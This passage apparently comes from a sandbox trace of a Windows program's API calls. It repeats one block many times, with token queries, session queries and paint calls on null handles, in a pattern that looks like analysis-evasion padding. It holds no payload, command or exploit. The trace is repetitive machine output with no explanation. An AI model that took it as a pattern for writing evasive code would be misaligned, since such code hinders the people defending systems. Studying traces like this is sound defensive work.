GetTickCount () returned 0x1f40f [0072.661] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.661] SetForegroundWindow (hWnd=0x0) returned 0 [0072.661] BringWindowToTop (hWnd=0x0) returned 0 [0072.661] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7c0) returned 1 [0072.661] GetTokenInformation (in: TokenHandle=0x7c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.661] GetLastError () returned 0x7a [0072.661] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.661] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.662] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.662] TextOutW (hdc=0x0, x=3564, y=8674, lpString="", c=0) returned 1 [0072.662] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.662] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.662] GetTickCount () returned 0x1f40f [0072.662] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.662] SetForegroundWindow (hWnd=0x0) returned 0 [0072.662] BringWindowToTop (hWnd=0x0) returned 0 [0072.663] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7c4) returned 1 [0072.663] GetTokenInformation (in: TokenHandle=0x7c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.663] GetLastError () returned 0x7a [0072.663] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.663] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.663] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.663] TextOutW (hdc=0x0, x=3574, y=8699, lpString="", c=0) returned 1 [0072.663] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.663] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.663] GetTickCount () returned 0x1f40f [0072.664] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.664] SetForegroundWindow (hWnd=0x0) returned 0 [0072.664] BringWindowToTop (hWnd=0x0) returned 0 [0072.664] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7c8) returned 1 [0072.664] GetTokenInformation (in: TokenHandle=0x7c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.664] GetLastError () returned 0x7a [0072.664] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.664] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.664] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.665] TextOutW (hdc=0x0, x=3584, y=8724, lpString="", c=0) returned 1 [0072.665] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.665] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.665] GetTickCount () returned 0x1f40f [0072.665] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.665] SetForegroundWindow (hWnd=0x0) returned 0 [0072.665] BringWindowToTop (hWnd=0x0) returned 0 [0072.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7cc) returned 1 [0072.666] GetTokenInformation (in: TokenHandle=0x7cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.666] GetLastError () returned 0x7a [0072.666] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.666] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.666] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.669] TextOutW (hdc=0x0, x=3594, y=8749, lpString="", c=0) returned 1 [0072.669] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.669] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.669] GetTickCount () returned 0x1f40f [0072.670] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.670] SetForegroundWindow (hWnd=0x0) returned 0 [0072.670] BringWindowToTop (hWnd=0x0) returned 0 [0072.670] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7d0) returned 1 [0072.670] GetTokenInformation (in: TokenHandle=0x7d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.670] GetLastError () returned 0x7a [0072.670] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.670] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.671] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.671] TextOutW (hdc=0x0, x=3604, y=8774, lpString="", c=0) returned 1 [0072.671] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.671] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.671] GetTickCount () returned 0x1f40f [0072.671] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.671] SetForegroundWindow (hWnd=0x0) returned 0 [0072.671] BringWindowToTop (hWnd=0x0) returned 0 [0072.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7d4) returned 1 [0072.672] GetTokenInformation (in: TokenHandle=0x7d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.672] GetLastError () returned 0x7a [0072.672] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.672] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.672] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.672] TextOutW (hdc=0x0, x=3614, y=8799, lpString="", c=0) returned 1 [0072.672] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.672] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.672] GetTickCount () returned 0x1f40f [0072.673] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.673] SetForegroundWindow (hWnd=0x0) returned 0 [0072.673] BringWindowToTop (hWnd=0x0) returned 0 [0072.673] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7d8) returned 1 [0072.673] GetTokenInformation (in: TokenHandle=0x7d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.673] GetLastError () returned 0x7a [0072.673] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.673] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.674] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.674] TextOutW (hdc=0x0, x=3624, y=8824, lpString="", c=0) returned 1 [0072.674] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.674] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.674] GetTickCount () returned 0x1f40f [0072.674] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.674] SetForegroundWindow (hWnd=0x0) returned 0 [0072.675] BringWindowToTop (hWnd=0x0) returned 0 [0072.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7dc) returned 1 [0072.675] GetTokenInformation (in: TokenHandle=0x7dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.675] GetLastError () returned 0x7a [0072.675] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.675] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.676] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.676] TextOutW (hdc=0x0, x=3634, y=8849, lpString="", c=0) returned 1 [0072.676] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.676] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.676] GetTickCount () returned 0x1f41f [0072.677] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.677] SetForegroundWindow (hWnd=0x0) returned 0 [0072.677] BringWindowToTop (hWnd=0x0) returned 0 [0072.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7e0) returned 1 [0072.677] GetTokenInformation (in: TokenHandle=0x7e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.677] GetLastError () returned 0x7a [0072.677] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.677] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.677] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.677] TextOutW (hdc=0x0, x=3644, y=8874, lpString="", c=0) returned 1 [0072.677] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.677] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.677] GetTickCount () returned 0x1f41f [0072.678] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.678] SetForegroundWindow (hWnd=0x0) returned 0 [0072.678] BringWindowToTop (hWnd=0x0) returned 0 [0072.678] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7e4) returned 1 [0072.678] GetTokenInformation (in: TokenHandle=0x7e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.678] GetLastError () returned 0x7a [0072.678] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.679] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.679] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.679] TextOutW (hdc=0x0, x=3654, y=8899, lpString="", c=0) returned 1 [0072.679] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.679] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.679] GetTickCount () returned 0x1f41f [0072.680] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.680] SetForegroundWindow (hWnd=0x0) returned 0 [0072.680] BringWindowToTop (hWnd=0x0) returned 0 [0072.680] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7e8) returned 1 [0072.680] GetTokenInformation (in: TokenHandle=0x7e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.680] GetLastError () returned 0x7a [0072.680] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.680] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.681] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.681] TextOutW (hdc=0x0, x=3664, y=8924, lpString="", c=0) returned 1 [0072.681] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.681] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.681] GetTickCount () returned 0x1f41f [0072.681] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.681] SetForegroundWindow (hWnd=0x0) returned 0 [0072.682] BringWindowToTop (hWnd=0x0) returned 0 [0072.682] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7ec) returned 1 [0072.682] GetTokenInformation (in: TokenHandle=0x7ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.682] GetLastError () returned 0x7a [0072.682] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.682] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.683] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.683] TextOutW (hdc=0x0, x=3674, y=8949, lpString="", c=0) returned 1 [0072.683] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.683] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.683] GetTickCount () returned 0x1f41f [0072.684] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.684] SetForegroundWindow (hWnd=0x0) returned 0 [0072.684] BringWindowToTop (hWnd=0x0) returned 0 [0072.684] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7f0) returned 1 [0072.684] GetTokenInformation (in: TokenHandle=0x7f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.684] GetLastError () returned 0x7a [0072.684] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.684] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.685] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.685] TextOutW (hdc=0x0, x=3684, y=8974, lpString="", c=0) returned 1 [0072.685] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.685] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.685] GetTickCount () returned 0x1f41f [0072.685] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.685] SetForegroundWindow (hWnd=0x0) returned 0 [0072.685] BringWindowToTop (hWnd=0x0) returned 0 [0072.685] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7f4) returned 1 [0072.686] GetTokenInformation (in: TokenHandle=0x7f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.686] GetLastError () returned 0x7a [0072.686] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.686] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.686] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.686] TextOutW (hdc=0x0, x=3694, y=8999, lpString="", c=0) returned 1 [0072.686] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.686] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.686] GetTickCount () returned 0x1f41f [0072.692] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.692] SetForegroundWindow (hWnd=0x0) returned 0 [0072.692] BringWindowToTop (hWnd=0x0) returned 0 [0072.692] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7f8) returned 1 [0072.692] GetTokenInformation (in: TokenHandle=0x7f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.692] GetLastError () returned 0x7a [0072.692] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.692] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.693] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.693] TextOutW (hdc=0x0, x=3704, y=9024, lpString="", c=0) returned 1 [0072.693] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.693] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.693] GetTickCount () returned 0x1f42e [0072.707] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.707] SetForegroundWindow (hWnd=0x0) returned 0 [0072.707] BringWindowToTop (hWnd=0x0) returned 0 [0072.707] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7fc) returned 1 [0072.707] GetTokenInformation (in: TokenHandle=0x7fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.707] GetLastError () returned 0x7a [0072.707] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.707] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.708] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.708] TextOutW (hdc=0x0, x=3714, y=9049, lpString="", c=0) returned 1 [0072.708] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.708] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.708] GetTickCount () returned 0x1f43e [0072.722] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.722] SetForegroundWindow (hWnd=0x0) returned 0 [0072.722] BringWindowToTop (hWnd=0x0) returned 0 [0072.722] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x804) returned 1 [0072.722] GetTokenInformation (in: TokenHandle=0x804, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.722] GetLastError () returned 0x7a [0072.722] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.722] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.723] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.723] TextOutW (hdc=0x0, x=3724, y=9074, lpString="", c=0) returned 1 [0072.723] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.723] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.723] GetTickCount () returned 0x1f44e [0072.724] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.724] SetForegroundWindow (hWnd=0x0) returned 0 [0072.725] BringWindowToTop (hWnd=0x0) returned 0 [0072.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x808) returned 1 [0072.725] GetTokenInformation (in: TokenHandle=0x808, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.725] GetLastError () returned 0x7a [0072.725] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.725] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.725] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.725] TextOutW (hdc=0x0, x=3734, y=9099, lpString="", c=0) returned 1 [0072.725] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.725] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.725] GetTickCount () returned 0x1f44e [0072.726] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.726] SetForegroundWindow (hWnd=0x0) returned 0 [0072.726] BringWindowToTop (hWnd=0x0) returned 0 [0072.726] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x80c) returned 1 [0072.726] GetTokenInformation (in: TokenHandle=0x80c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.726] GetLastError () returned 0x7a [0072.726] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.726] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.727] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.727] TextOutW (hdc=0x0, x=3744, y=9124, lpString="", c=0) returned 1 [0072.727] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.727] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.727] GetTickCount () returned 0x1f44e [0072.728] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.728] SetForegroundWindow (hWnd=0x0) returned 0 [0072.728] BringWindowToTop (hWnd=0x0) returned 0 [0072.728] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x810) returned 1 [0072.728] GetTokenInformation (in: TokenHandle=0x810, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.728] GetLastError () returned 0x7a [0072.728] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.728] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.728] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.728] TextOutW (hdc=0x0, x=3754, y=9149, lpString="", c=0) returned 1 [0072.728] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.728] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.728] GetTickCount () returned 0x1f44e [0072.729] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.729] SetForegroundWindow (hWnd=0x0) returned 0 [0072.729] BringWindowToTop (hWnd=0x0) returned 0 [0072.729] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x814) returned 1 [0072.729] GetTokenInformation (in: TokenHandle=0x814, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.729] GetLastError () returned 0x7a [0072.729] 